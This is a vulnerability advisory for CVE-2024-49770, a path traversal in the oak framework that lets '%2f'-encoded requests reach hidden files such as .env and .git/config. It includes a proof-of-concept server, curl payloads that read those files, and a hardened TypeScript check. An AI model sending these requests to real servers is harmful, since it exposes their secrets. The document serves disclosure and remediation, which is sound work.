CVE-2024-49770
Path traversal in oak allows transfer of hidden files within the served root directory
Description
### Summary

By default `oak` does not allow transferring of hidden files with the `Context.send` API. However, this can be bypassed by encoding `/` as its URL-encoded form `%2F`.

### Details

1. Oak uses [decodeComponent](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25), which seems to be unexpected. This is also the reason why it is not possible to access a file that contains URL-encoded characters unless the client URL-encodes it first.
2. The function [isHidden](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125) is flawed since it only checks whether the first subpath is hidden, allowing secrets to be read from `subdir/.env`.

### PoC

```ts
// server.ts
import { Application } from "jsr:@oak/[email protected]";

const app = new Application();

app.use(async (context, next) => {
  try {
    await context.send({
      root: './root',
      hidden: false, // default
    });
  } catch {
    await next();
  }
});

await app.listen({ port: 8000 });
```

In terminal:

```bash
# setup root directory
mkdir root/.git
echo SECRET_KEY=oops > root/.env
echo oops > root/.git/config

# start server
deno run -A server.ts

# in another terminal
curl -D- http://127.0.0.1:8000/poc%2f../.env
curl -D- http://127.0.0.1:8000/poc%2f../.git/config
```

### Impact

For an attacker this has the potential to read sensitive user data or to gain access to server secrets.
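The two details above combine: the request path is percent-decoded before the hidden-file check, and the check looks only at the first path segment. The following TypeScript is an added example, not Oak's own source, contrasting a simplified stand-in for the first-segment-only behaviour the advisory describes with a hardened check that normalizes `.` and `..` segments and then rejects the path if any remaining segment starts with a dot. The function names (`isHiddenFirstSegmentOnly`, `isHiddenAnySegment`, `shouldServe`) are assumptions for illustration.

```typescript
// Added example (not Oak's code): why a hidden-file check must look at
// every path segment after decoding and normalization.

// Simplified stand-in for the flawed behaviour described in the advisory:
// only the first segment is inspected. Assumption for illustration, not
// Oak's actual source.
function isHiddenFirstSegmentOnly(path: string): boolean {
  const first = path.split("/").filter((s) => s.length > 0)[0] ?? "";
  return first.startsWith(".");
}

// Hardened check: resolve "." and ".." lexically, then flag the path if
// any remaining segment is a dotfile or dot-directory.
function isHiddenAnySegment(path: string): boolean {
  const segments: string[] = [];
  for (const seg of path.split("/")) {
    if (seg === "" || seg === ".") continue; // empty and current-dir segments
    if (seg === "..") {                      // parent-dir segment: pop, never escape root
      segments.pop();
      continue;
    }
    segments.push(seg);
  }
  return segments.some((s) => s.startsWith("."));
}

// Decision a static-file handler would make for a raw request path.
// Decoding happens first so that "%2f" cannot hide a separator from the check.
function shouldServe(rawUrlPath: string, hidden = false): boolean {
  const decoded = decodeURIComponent(rawUrlPath);
  if (!hidden && isHiddenAnySegment(decoded)) return false;
  return true;
}

// Constructed sample paths mirroring the advisory's PoC requests.
const samples = ["/poc%2f../.env", "/poc%2f../.git/config", "/subdir/.env", "/index.html"];
for (const p of samples) {
  const d = decodeURIComponent(p);
  console.log(p, "first-only:", isHiddenFirstSegmentOnly(d), "any-segment:", isHiddenAnySegment(d));
}
```

The first-segment-only check sees `poc` in `poc/../.env` and lets the request through; the segment-wise check normalizes it to `.env` and refuses it, and it also catches the nested `subdir/.env` case the advisory names.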
How to fix CVE-2024-49770
No fixed version has been released yet. Consider removing the affected package, or refer to the upstream advice in the links below.
- No fixed version listed
Is CVE-2024-49770 being exploited?
Low: EPSS is 0.1%, and no large-scale exploitation activity has been observed.
Affected packages (1)
- from 0, <= 14.1.0